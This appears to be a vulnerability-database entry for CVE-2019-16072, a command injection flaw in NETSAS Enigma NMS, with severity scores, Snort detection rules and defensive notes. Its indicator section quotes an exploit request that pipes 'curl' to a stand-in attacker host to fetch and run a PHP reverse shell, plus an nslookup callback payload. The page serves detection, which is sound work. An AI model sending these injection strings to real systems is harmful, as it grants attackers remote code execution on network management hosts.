cbcvebase.
CVE-2019-16072
published 2020-03-20

CVE-2019-16072: An OS command injection vulnerability in the discover_and_manage CGI script in NETSAS Enigma NMS 65.0.0 and prior allows an attacker to execute arbitrary code…

PriorityP185critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
25.28%
97.7th percentile
An OS command injection vulnerability in the discover_and_manage CGI script in NETSAS Enigma NMS 65.0.0 and prior allows an attacker to execute arbitrary code because of improper neutralization of shell metacharacters in the ip_address variable within an snmp_browser action.

Affected

1 ranges
VendorProductVersion rangeFixed in
netsasenigma_network_management_solution<= 65.0.0

Detection & IOCsextracted from sources · hover to see the quote

url/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|curl%20<attack_host>:<web_svr_port>/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1
path/cgi-bin/protected/discover_and_manage.cgi
command|nslookup+{{interactsh-url}}
bytes
|7c| (pipe character) in ip_address parameter of /cgi-bin/protected/discover_and_manage.cgi URI
snort
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Enigma Network Management Systems v65.0.0 CVE-2019-16072 (Outbound)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|7c|"; startswith; fast_pattern; reference:url,unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; reference:cve,2019-16072; classtype:attempted-admin; sid:2029158; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2019_12_16, cve CVE_2019_16072, deployment Perimeter, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_04_13;)
snort
alert http $EXTERNAL_NET any -> any any (msg:"ET EXPLOIT Enigma Network Management Systems v65.0.0 CVE-2019-16072 (Inbound)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|7c|"; startswith; fast_pattern; reference:url,unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; reference:cve,2019-16072; classtype:attempted-admin; sid:2029159; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2019_12_16, cve CVE_2019_16072, deployment Perimeter, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_04_13;)
  • The exploit uses HTTP GET (PoC script) but the ET Snort rules trigger on POST method to the vulnerable CGI endpoint — monitor both GET and POST to /cgi-bin/protected/discover_and_manage.cgi with action=snmp_browser and a pipe character (|, hex 7c) in the ip_address parameter.
  • The exploit drops and serves a PHP reverse shell file named evil.php via a temporary HTTP server; detect outbound curl requests from the NMS host fetching .php files from attacker-controlled infrastructure.
  • The Nuclei template uses an OOB/OAST DNS callback (interactsh) to confirm blind command injection; look for unexpected DNS lookups originating from the NMS host as a sign of exploitation.
  • The exploit authenticates with HTTP Basic Auth before injecting; correlate successful Basic Auth logins to /cgi-bin/protected/main.cgi followed immediately by requests to discover_and_manage.cgi with shell metacharacters in ip_address.
  • The vulnerability is exploited in-the-wild by the Mirai variant EchoBot; correlate CVE-2019-16072 exploitation attempts with other EchoBot IoT exploit signatures.
  • ·The Nuclei template is marked 'verified: false', meaning the detection logic has not been confirmed against a live target and may produce false positives or false negatives.
  • ·The exploit PoC uses HTTP GET, but the ET Snort rules are written for POST; deployments should ensure both HTTP methods are covered when writing detection rules for this CGI endpoint.
  • ·Exploitation requires valid credentials (HTTP Basic Auth); unauthenticated scanning will not trigger the vulnerability, so detections relying solely on unauthenticated probes will miss authenticated attacker sessions.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.